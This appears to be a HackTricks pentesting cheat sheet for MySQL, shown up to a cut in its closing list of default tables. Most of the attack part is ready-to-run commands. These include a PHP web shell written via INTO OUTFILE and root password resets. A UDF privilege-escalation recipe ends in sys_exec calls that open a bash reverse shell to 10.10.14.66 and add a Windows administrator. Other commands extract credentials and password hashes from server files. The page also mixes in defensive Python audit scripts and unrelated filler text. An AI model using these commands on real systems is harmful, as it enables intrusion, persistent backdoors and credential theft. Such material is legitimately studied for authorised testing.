hacktricks/network-services-pentesting/pentesting-mysql.md
2023-08-03 19:12:22 +00:00


# 3306 - Pentesting Mysql
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want access to the **latest version of PEASS or download HackTricks as PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)**.**
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) is one of the most relevant cybersecurity events in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
## **Basic Information**
**MySQL** is a free, open-source Relational Database Management System (RDBMS) that uses Structured Query Language (**SQL**). From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).
**Default port:** 3306
```
3306/tcp open mysql
```
## **Connect**
### **Local**
```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
```
### Remote
MySQL allows remote connections by default, which means that it can be accessed from other machines on the network. This can be a security risk if proper precautions are not taken.
To secure remote access to MySQL, you can follow these steps:
1. **Bind MySQL to a specific IP address**: By default, MySQL listens on all available IP addresses. You can change this by modifying the `bind-address` parameter in the MySQL configuration file (`my.cnf`). Set it to the IP address you want MySQL to listen on.
2. **Create a firewall rule**: Configure your firewall to only allow incoming connections to the MySQL port (default is 3306) from trusted IP addresses or networks. This will prevent unauthorized access to the MySQL service.
3. **Use strong passwords**: Ensure that all MySQL user accounts have strong, unique passwords. Avoid using default or easily guessable passwords.
4. **Limit privileges**: Grant only the necessary privileges to MySQL user accounts. Avoid granting unnecessary privileges that could be exploited by an attacker.
5. **Enable SSL/TLS encryption**: Configure MySQL to use SSL/TLS encryption for secure communication between the client and the server. This will protect the data transmitted over the network from eavesdropping and tampering.
By following these steps, you can enhance the security of your MySQL server and reduce the risk of unauthorized access or data breaches.
```bash
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
```
## External Enumeration
Some of the enumeration actions require valid credentials
```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```
### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#mysql)
### Write any binary data
```bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
```
## **MySQL commands**
MySQL is a popular open-source relational database management system. It is widely used in web applications and is known for its speed and reliability. In this section, we will explore some commonly used MySQL commands for database management and manipulation.
### **Connecting to MySQL**
To connect to a MySQL server, you can use the following command:
```bash
mysql -h <host> -u <username> -p
```
Replace `<host>` with the hostname or IP address of the MySQL server and `<username>` with the username; the `-p` flag makes the client prompt for the password instead of taking it on the command line.
### **Creating a Database**
To create a new database, use the `CREATE DATABASE` command:
```sql
CREATE DATABASE <database_name>;
```
Replace `<database_name>` with the desired name for the database.
### **Selecting a Database**
To select a database to work with, use the `USE` command:
```sql
USE <database_name>;
```
Replace `<database_name>` with the name of the database you want to select.
### **Creating a Table**
To create a new table in a database, use the `CREATE TABLE` command:
```sql
CREATE TABLE <table_name> (
<column1_name> <column1_type>,
<column2_name> <column2_type>,
...
);
```
Replace `<table_name>` with the desired name for the table, `<column1_name>` with the name of the first column, `<column1_type>` with the data type of the first column, and so on.
### **Inserting Data**
To insert data into a table, use the `INSERT INTO` command:
```sql
INSERT INTO <table_name> (<column1_name>, <column2_name>, ...)
VALUES (<value1>, <value2>, ...);
```
Replace `<table_name>` with the name of the table, `<column1_name>` and `<column2_name>` with the names of the columns you want to insert data into, and `<value1>`, `<value2>`, etc. with the corresponding values.
### **Querying Data**
To retrieve data from a table, use the `SELECT` command:
```sql
SELECT <column1_name>, <column2_name>, ...
FROM <table_name>
WHERE <condition>;
```
Replace `<column1_name>`, `<column2_name>`, etc. with the names of the columns you want to retrieve, `<table_name>` with the name of the table, and `<condition>` with the condition that the data must meet.
### **Updating Data**
To update data in a table, use the `UPDATE` command:
```sql
UPDATE <table_name>
SET <column1_name> = <new_value1>, <column2_name> = <new_value2>, ...
WHERE <condition>;
```
Replace `<table_name>` with the name of the table, `<column1_name>`, `<column2_name>`, etc. with the names of the columns you want to update, `<new_value1>`, `<new_value2>`, etc. with the new values, and `<condition>` with the condition that the data must meet.
### **Deleting Data**
To delete data from a table, use the `DELETE FROM` command:
```sql
DELETE FROM <table_name>
WHERE <condition>;
```
Replace `<table_name>` with the name of the table and `<condition>` with the condition that the data must meet.
### **Dropping a Database**
To drop a database, use the `DROP DATABASE` command:
```sql
DROP DATABASE <database_name>;
```
Replace `<database_name>` with the name of the database you want to drop.
### **Dropping a Table**
To drop a table, use the `DROP TABLE` command:
```sql
DROP TABLE <table_name>;
```
Replace `<table_name>` with the name of the table you want to drop.
These are just a few of the many commands available in MySQL. By mastering these commands, you will have a solid foundation for managing and manipulating databases using MySQL.
```bash
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;
select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name
#Get a shell with the mysql client user
\! sh
#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"
#Read & Write
## You need the FILE privilege to read & write files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
```
```bash
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```
### MySQL Permissions Enumeration
MySQL is a widely used relational database management system for storing and managing data. When pentesting MySQL it is important to understand the permission settings of the target database. By enumerating MySQL privileges we can determine the privilege level of the current user and look for permission weaknesses that could be abused.
Here are some commonly used MySQL privilege enumeration techniques:
#### 1. SHOW GRANTS
The `SHOW GRANTS` statement shows the privileges of the current user, i.e. every privilege that has been granted to it.
```sql
SHOW GRANTS;
```
#### 2. INFORMATION_SCHEMA
MySQL's `INFORMATION_SCHEMA` database stores metadata about databases, tables, columns and privileges. We can query `INFORMATION_SCHEMA` to get detailed information about privileges.
```sql
SELECT * FROM INFORMATION_SCHEMA.USER_PRIVILEGES;
```
#### 3. mysql.user table
The `mysql.user` table contains the details of the MySQL users, including user names, password hashes and privileges. We can query this table to get information about user privileges.
```sql
SELECT * FROM mysql.user;
```
#### 4. SHOW GRANTS FOR
The `SHOW GRANTS FOR` statement shows the privileges of a specified user. Replace `<username>` with the user you want to query.
```sql
SHOW GRANTS FOR <username>;
```
#### 5. mysql.db table
The `mysql.db` table stores database-level privileges. We can query this table to get information about database privileges.
```sql
SELECT * FROM mysql.db;
```
#### 6. mysql.tables_priv table
The `mysql.tables_priv` table stores table-level privileges. We can query this table to get information about table privileges.
```sql
SELECT * FROM mysql.tables_priv;
```
#### 7. mysql.columns_priv table
The `mysql.columns_priv` table stores column-level privileges. We can query this table to get information about column privileges.
```sql
SELECT * FROM mysql.columns_priv;
```
By using these MySQL privilege enumeration techniques we can better understand the permission settings of the target database and find possible security weaknesses.
```sql
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();
# Get users, permissions & hashes
SELECT * FROM mysql.user;
#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';
# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
## Functions not from the sys db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```
You can see what each privilege means in the docs: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute)
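As an added example (my own code, not from HackTricks), here is a defender-side audit of the `SHOW GRANTS` output the statements above produce: it parses each `GRANT ...` line and flags the accounts an auditor would want to review (global `ALL PRIVILEGES`, the `FILE` and `SUPER` privileges that matter elsewhere on this page, `WITH GRANT OPTION`, and wildcard hosts). The grant lines are a constructed sample; the severity labels are mine.

```python
"""Audit SHOW GRANTS output for over-privileged MySQL accounts (defender-side check).

Added example, not HackTricks code. Sample grants below are constructed.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "account severity reason")

# One line of SHOW GRANTS output. MySQL 5.x quotes user/host with ', MySQL 8 with `.
_GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"(?P<user>[`'][^`']*[`'])@(?P<host>[`'][^`']*[`'])(?P<rest>.*)$",
    re.IGNORECASE,
)


def parse_grant(line):
    """Return the parts of a GRANT line, or None for lines of another shape
    (e.g. MySQL 8 role grants 'GRANT `role`@`%` TO `user`@`host`')."""
    m = _GRANT_RE.match(line.strip().rstrip(";"))
    if not m:
        return None
    return {
        "user": m.group("user")[1:-1],
        "host": m.group("host")[1:-1],
        "scope": m.group("scope").replace("`", ""),   # *.*, db.*, db.table
        "privs": [p.strip().upper() for p in m.group("privs").split(",")],
        "grant_option": "WITH GRANT OPTION" in m.group("rest").upper(),
    }


def audit_grants(lines):
    """Flag grants a reviewer should question. Severity labels are this example's own."""
    findings = []
    for line in lines:
        g = parse_grant(line)
        if g is None:
            continue
        acct = f"{g['user']}@{g['host']}"
        privs = set(g["privs"])
        if g["scope"] == "*.*" and "ALL PRIVILEGES" in privs:
            findings.append(Finding(acct, "HIGH", "ALL PRIVILEGES on *.*: full administrative control"))
        for p in ("FILE", "SUPER"):
            if p in privs:
                findings.append(Finding(acct, "HIGH", f"{p} privilege: server-side file access / admin operations"))
        if g["grant_option"]:
            findings.append(Finding(acct, "MEDIUM", "WITH GRANT OPTION: can hand its privileges to other accounts"))
        # '%' and '_' are wildcards in MySQL host patterns; USAGE alone grants nothing.
        if any(c in g["host"] for c in "%_") and privs != {"USAGE"}:
            findings.append(Finding(acct, "MEDIUM", f"host pattern {g['host']!r} accepts logins from any matching address"))
    return findings


SAMPLE_GRANTS = [  # constructed sample, not from a real server
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT USAGE ON *.* TO 'app'@'%'",
    "GRANT SELECT, INSERT, UPDATE ON `shop`.* TO 'app'@'%'",
    "GRANT FILE ON *.* TO 'report'@'10.0.0.%'",
]

if __name__ == "__main__":
    for f in audit_grants(SAMPLE_GRANTS):
        print(f"[{f.severity}] {f.account}: {f.reason}")
```

Feed it the real output of `SHOW GRANTS FOR 'user'@'host'` for every row of `mysql.user` and the list becomes a quick review of who can touch files, administer the server or delegate privileges.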
### MySQL File RCE
{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %}
[mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
{% endcontent-ref %}
## MySQL arbitrary read file by client
Actually, when you try to **load data local into a table** from the **content of a file**, the MySQL or MariaDB server asks the **client to read the file and send its content**. **So if you can tamper with a mysql client so that it connects to your own MySQL server, you can read arbitrary files.**\
Please note that this is the behaviour when using:
```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```
Note the word "local"\
Because without "local" you can get:
```bash
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```
**Initial PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**In this paper you can see a complete description of the attack and even how to extend it to RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**Here you can find an overview of the attack:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
## POST
### Mysql User
It will be very interesting if mysql is running as **root**:
```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```
#### Dangerous Settings of mysqld.cnf
From [https://academy.hackthebox.com/module/112/section/1238](https://academy.hackthebox.com/module/112/section/1238)
| **Settings** | **Description** |
| ------------------ | ----------------------------------------------------------------------------------------------------------------------------------------- |
| `user` | Sets which user the MySQL service will run as. |
| `password` | Sets the password for the MySQL user. |
| `admin_address` | The IP address on which to listen for TCP/IP connections on the administrative network interface. |
| `debug` | This variable indicates the current debugging settings (sensitive information in the logs). |
| `sql_warnings` | This variable controls whether single-row INSERT statements produce an information string if warnings occur (sensitive information in the logs). |
| `secure_file_priv` | This variable is used to limit the effect of data import and export operations. |
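To make the table above, the remote-access hardening steps from the Remote section (`bind-address`) and the client-side `local_infile` behaviour from the arbitrary-file-read section checkable, the following Python script (an added example, not from HackTricks or HTB) parses a `my.cnf` and reports the weak settings, with a hardened file for comparison. Both configurations are constructed samples; the option names are real MySQL options, the severity labels are my own.

```python
"""Audit a my.cnf-style configuration for the risky settings discussed on this page.

Added example, not HackTricks/HTB code. Both sample configurations are constructed.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "severity section option detail")
_TRUE = {"1", "on", "true", "yes"}


def parse_mycnf(text):
    """Parse my.cnf into {section: {option: value}}.

    MySQL treats '-' and '_' in option names as equivalent, so names are
    normalised to '_'. A bare option ('local-infile') is recorded as 'ON';
    a 'skip-' prefix ('skip-networking') records the option as 'OFF'.
    """
    config, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        line = line.split("#", 1)[0].strip()   # '#' also starts a trailing comment
        m = re.fullmatch(r"\[([\w.-]+)\]", line)
        if m:
            section = m.group(1).lower()
            config.setdefault(section, {})
            continue
        if section is None:
            continue
        key, sep, value = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        value = value.strip().strip("\"'")
        if not sep:
            if key.startswith("skip_"):
                key, value = key[len("skip_"):], "OFF"
            else:
                value = "ON"
        config[section][key] = value
    return config


def audit_config(config):
    """Return the findings a reviewer would raise against the parsed config."""
    f = []
    srv = config.get("mysqld", {})
    if srv.get("user") == "root":
        f.append(Finding("HIGH", "mysqld", "user", "server runs as root: file writes and UDFs run with root privileges"))
    if srv.get("networking", "ON") != "OFF":   # skip-networking not set, so TCP is open
        bind = srv.get("bind_address")
        if bind is None or bind in {"0.0.0.0", "::", "*"}:
            f.append(Finding("MEDIUM", "mysqld", "bind_address", "listens on every interface: bind a specific address and firewall 3306"))
    if "secure_file_priv" not in srv:
        f.append(Finding("LOW", "mysqld", "secure_file_priv", "not set explicitly: confirm the compiled-in default with SHOW VARIABLES"))
    elif srv["secure_file_priv"] == "":
        f.append(Finding("HIGH", "mysqld", "secure_file_priv", "empty value removes the path restriction on LOAD_FILE / INTO OUTFILE"))
    if srv.get("local_infile", "").lower() in _TRUE:
        f.append(Finding("MEDIUM", "mysqld", "local_infile", "server accepts LOAD DATA LOCAL from clients"))
    if srv.get("require_secure_transport", "OFF").lower() not in _TRUE:
        f.append(Finding("LOW", "mysqld", "require_secure_transport", "plaintext connections are accepted"))
    if "debug" in srv:
        f.append(Finding("MEDIUM", "mysqld", "debug", "debug tracing can write sensitive data to logs"))
    if srv.get("sql_warnings", "").lower() in _TRUE:
        f.append(Finding("LOW", "mysqld", "sql_warnings", "INSERT warnings echo row data into logs"))
    if "admin_address" in srv:
        f.append(Finding("INFO", "mysqld", "admin_address", f"administrative interface bound on {srv['admin_address']}"))
    for sec in ("client", "mysql"):   # option groups read by the command-line client
        if config.get(sec, {}).get("local_infile", "").lower() in _TRUE:
            f.append(Finding("MEDIUM", sec, "local_infile", "client will send any file a server (including a rogue one) asks for"))
    for sec, opts in config.items():
        if "password" in opts:
            f.append(Finding("MEDIUM", sec, "password", "plaintext credential stored in the config file"))
    return f


def audit_text(text):
    return audit_config(parse_mycnf(text))


WEAK_CNF = """# constructed weak configuration
[mysqld]
user = root
bind-address = 0.0.0.0
secure_file_priv = ""
local_infile = 1
debug = d:t:o,/tmp/mysqld.trace
[client]
local-infile = 1
password = hunter2
"""

HARDENED_CNF = """# constructed hardened configuration
[mysqld]
user = mysql
bind-address = 127.0.0.1
secure_file_priv = /var/lib/mysql-files
local_infile = 0
require_secure_transport = ON
[client]
local-infile = 0
"""

if __name__ == "__main__":
    for label, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(f"== {label}: {len(audit_text(cnf))} finding(s)")
        for x in audit_text(cnf):
            print(f"[{x.severity}] [{x.section}] {x.option}: {x.detail}")
```

The file is only half the picture: settings can also come from other included files or the command line, so confirm the effective values with `SHOW VARIABLES` on the running server.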
### Privilege escalation
```bash
# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"
# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
# Get a shell (with your permissions, useful for sudo/suid privesc)
\! sh
```
### Privilege Escalation via library
If the **mysql server is running as root** (or a different, more privileged user) you can make it execute commands. For that you need to use **user defined functions**, and to create a user defined function you need a **library** for the OS that is running mysql.
The malicious library to use can be found inside sqlmap and inside metasploit by running **`locate "*lib_mysqludf_sys*"`**. The **`.so`** files are **Linux** libraries and the **`.dll`** are the **Windows** ones; choose the one you need.
If you **don't have** those libraries you can either **look for them**, or download this [**Linux C code**](https://www.exploit-db.com/exploits/1518) and **compile it inside the vulnerable Linux machine**:
```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
Now that you have the library, log in to MySQL as a privileged user (root?) and follow the next steps:
#### Linux
```sql
# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
```
#### Windows
MySQL can be installed on Windows using the official installer available on the MySQL website. Once installed, the MySQL service will be running in the background.
To connect to the MySQL server on Windows, you can use the MySQL Command Line Client or a graphical user interface (GUI) tool like MySQL Workbench.
To access the MySQL Command Line Client, open the Command Prompt and type `mysql -u <username> -p`. Replace `<username>` with the username you want to use to connect to the MySQL server. You will be prompted to enter the password for the specified username.
To use a GUI tool like MySQL Workbench, you will need to download and install it from the MySQL website. Once installed, open MySQL Workbench and click on the "+" icon in the "MySQL Connections" section to create a new connection. Enter the necessary details like the connection name, hostname, port, username, and password, and click "Test Connection" to verify the connection.
Once connected to the MySQL server, you can perform various tasks like creating databases, tables, and executing SQL queries.
```sql
# Check the Linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```
### Extracting MySQL credentials from files
Inside _/etc/mysql/debian.cnf_ you can find the **plaintext password** of the user **debian-sys-maint**.
```bash
cat /etc/mysql/debian.cnf
```
You can use these credentials to log in to the mysql database.
Inside the file _/var/lib/mysql/mysql/user.MYD_ you can find all the hashes of the MySQL users (the ones you can extract from mysql.user inside the database).
You can extract them with:
```bash
grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
### Enabling logging
You can enable logging of mysql queries inside `/etc/mysql/my.cnf` by uncommenting the following lines:
![](<../.gitbook/assets/image (277).png>)
### Useful files
Configuration Files
* windows \*
  * config.ini
  * my.ini
    * windows\my.ini
    * winnt\my.ini
  * \<InstDir>/mysql/data/
* unix
  * my.cnf
    * /etc/my.cnf
    * /etc/mysql/my.cnf
    * /var/lib/mysql/my.cnf
    * \~/.my.cnf
    * /etc/my.cnf
* Command History
  * \~/.mysql.history
* Log Files
  * connections.log
  * update.log
  * common.log
## Default MySQL Database/Tables
{% tabs %}
{% tab title="information_schema" %}
ALL\_PLUGINS\
APPLICABLE\_ROLES\
CHARACTER\_SETS\
CHECK\_CONSTRAINTS\
COLLATIONS\
COLLATION\_CHARACTER\_SET\_APPLICABILITY\
COLUMNS\
COLUMN\_PRIVILEGES\
ENABLED\_ROLES\
ENGINES\
EVENTS\
FILES\
GLOBAL\_STATUS\
GLOBAL\_VARIABLES\
KEY\_COLUMN\_USAGE\
KEY\_CACHES\
OPTIMIZER\_TRACE\
PARAMETERS\
PARTITIONS\
PLUGINS\
PROCESSLIST\
PROFILING\
REFERENTIAL\_CONSTRAINTS\
ROUTINES\
SCHEMATA\
SCHEMA\_PRIVILEGES\
SESSION\_STATUS\
SESSION\_VARIABLES\
STATISTICS\
SYSTEM\_VARIABLES\
TABLES\
TABLESPACES\
TABLE\_CONSTRAINTS\
TABLE\_PRIVILEGES\
TRIGGERS\
USER\_PRIVILEGES\
VIEWS\
INNODB\_LOCKS\
INNODB\_TRX\
INNODB\_SYS\_DATAFILES\
INNODB\_FT\_CONFIG\
INNODB\_SYS\_VIRTUAL\
INNODB\_CMP\
INNODB\_FT\_BEING\_DELETED\
INNODB\_CMP\_RESET\
INNODB\_CMP\_PER\_INDEX\
INNODB\_CMPMEM\_RESET\
INNODB\_FT\_DELETED\
INNODB\_BUFFER\_PAGE\_LRU\
INNODB\_LOCK\_WAITS\
INNODB\_TEMP\_TABLE\_INFO\
INNODB\_SYS\_INDEXES\
INNODB\_SYS\_TABLES\
INNODB\_SYS\_FIELDS\
INNODB\_CMP\_PER\_INDEX\_RESET\
INNODB\_BUFFER\_PAGE\
INNODB\_FT\_DEFAULT\_STOPWORD\
INNODB\_FT\_INDEX\_TABLE\
INNODB\_FT\_INDEX\_CACHE\
INNODB\_SYS\_TABLESPACES\
INNODB\_METRICS\
INNODB\_SYS\_FOREIGN\_COLS\
INNODB\_CMPMEM\
INNODB\_BUFFER\_POOL\_STATS\
INNODB\_SYS\_COLUMNS\
INNODB\_SYS\_FOREIGN\
INNODB\_SYS\_TABLESTATS\
GEOMETRY\_COLUMNS\
SPATIAL\_REF\_SYS\
CLIENT\_STATISTICS\
INDEX\_STATISTICS\
USER\_STATISTICS\
INNODB\_MUTEXES\
TABLE\_STATISTICS\
INNODB\_TABLESPACES\_ENCRYPTION\
user\_variables\
INNODB\_TABLESPACES\_SCRUBBING\
INNODB\_SYS\_SEMAPHORE\_WAITS
{% endtab %}
{% tab title="mysql" %}
columns\_priv\
column\_stats\
db\
engine\_cost\
event\
func\
general\_log\
gtid\_executed\
gtid\_slave\_pos\
help\_category\
help\_keyword\
help\_relation\
help\_topic\
host\
index\_stats\
innodb\_index\_stats\
innodb\_table\_stats\
ndb\_binlog\_index\
plugin\
proc\
procs\_priv\
proxies\_priv\
roles\_mapping\
server\_cost\
servers\
slave\_master\_info\
slave\_relay\_log\_info\
slave\_worker\_info\
slow\_log\
tables\_priv\
table\_stats\
time\_zone\
time\_zone\_leap\_second\
time\_zone\_name\
time\_zone\_transition\
time\_zone\_transition\_type\
transaction\_registry\
user
{% endtab %}
{% tab title="performance_schema" %}
accounts\
cond\_instances\
events\_stages\_current\
events\_stages\_history\
events\_stages\_history\_long\
events\_stages\_summary\_by\_account\_by\_event\_name\
events\_stages\_summary\_by\_host\_by\_event\_name\
events\_stages\_summary\_by\_thread\_by\_event\_name\
events\_stages\_summary\_by\_user\_by\_event\_name\
events\_stages\_summary\_global\_by\_event\_name\
events\_statements\_current\
events\_statements\_history\
events\_statements\_history\_long\
events\_statements\_summary\_by\_account\_by\_event\_name\
events\_statements\_summary\_by\_digest\
events\_statements\_summary\_by\_host\_by\_event\_name\
events\_statements\_summary\_by\_program\
events\_statements\_summary\_by\_thread\_by\_event\_name\
events\_statements\_summary\_by\_user\_by\_event\_name\
events\_statements\_summary\_global\_by\_event\_name\
events\_transactions\_current\
events\_transactions\_history\
events\_transactions\_history\_long\
events\_transactions\_summary\_by\_account\_by\_event\_name\
events\_transactions\_summary\_by\_host\_by\_event\_name\
events\_transactions\_summary\_by\_thread\_by\_event\_name\
events\_transactions\_summary\_by\_user\_by\_event\_name\
events\_transactions\_summary\_global\_by\_event\_name\
events\_waits\_current\
events\_waits\_history\
events\_waits\_history\_long\
events\_waits\_summary\_by\_account\_by\_event\_name\
events\_waits\_summary\_by\_host\_by\_event\_name\
events\_waits\_summary\_by\_instance\
events\_waits\_summary\_by\_thread\_by\_event\_name\
events\_waits\_summary\_by\_user\_by\_event\_name\
events\_waits\_summary\_global\_by\_event\_name\
file\_instances\
file\_summary\_by\_event\_name\
file\_summary\_by\_instance\
global\_status\
global\_variables\
host\_cache\
hosts\
memory\_summary\_by\_account\_by\_event\_name\
memory\_summary\_by\_host\_by\_event\_name\
memory\_summary\_by\_thread\_by\_event\_name\
memory\_summary\_by\_user\_by\_event\_name\
memory\_summary\_global\_by\_event\_name\
metadata\_locks\
mutex\_instances\
objects\_summary\_global\_by\_type\
performance\_timers\
prepared\_statements\_instances\
replication\_applier\_configuration\
replication\_applier\_status\
replication\_applier\_status\_by\_coordinator\
replication\_applier\_status\_by\_worker\
replication\_connection\_configuration\
replication\_connection\_status\
replication\_group\_member\_stats\
replication\_group\_members\
rwlock\_instances\
session\_account\_connect\_attrs\
session\_connect\_attrs\
session\_status\
session\_variables\
setup\_actors\
setup\_consumers\
setup\_instruments\
setup\_objects\
setup\_timers\
socket\_instances\
socket\_summary\_by\_event\_name\
socket\_summary\_by\_instance\
status\_by\_account\
status\_by\_host\
status\_by\_thread\
status\_by\_user\
table\_handles\
table\_io\_waits\_summary\_by\_index\_usage\
table\_io\_waits\_summary\_by\_table\
table\_lock\_waits\_summary\_by\_table\
threads\
user\_variables\_by\_thread\
users\
variables\_by\_thread
{% endtab %}
{% tab title="sys" %}
host\_summary\
host_summary_by_file_io\
host_summary_by_file_io_type\
host_summary_by_stages\
host_summary_by_statement_latency\
host_summary_by_statement_type\
innodb_buffer_stats_by_schema\
innodb_buffer_stats_by_table\
innodb_lock_waits\
io_by_thread_by_latency\
io_global_by_file_by_bytes\
io_global_by_file_by_latency\
io_global_by_wait_by_bytes\
io_global_by_wait_by_latency\
latest_file_io\
memory_by_host_by_current_bytes\
memory_by_thread_by_current_bytes\
memory_by_user_by_current_bytes\
memory_global_by_current_bytes\
memory_global_total\
metrics\
processlist\
ps_check_lost_instrumentation\
schema_auto_increment_columns\
schema_index_statistics\
schema_object_overview\
schema_redundant_indexes\
schema_table_lock_waits\
schema_table_statistics\
schema_table_statistics_with_buffer\
schema_tables_with_full_table_scans\
schema_unused_indexes\
session\
session_ssl_status\
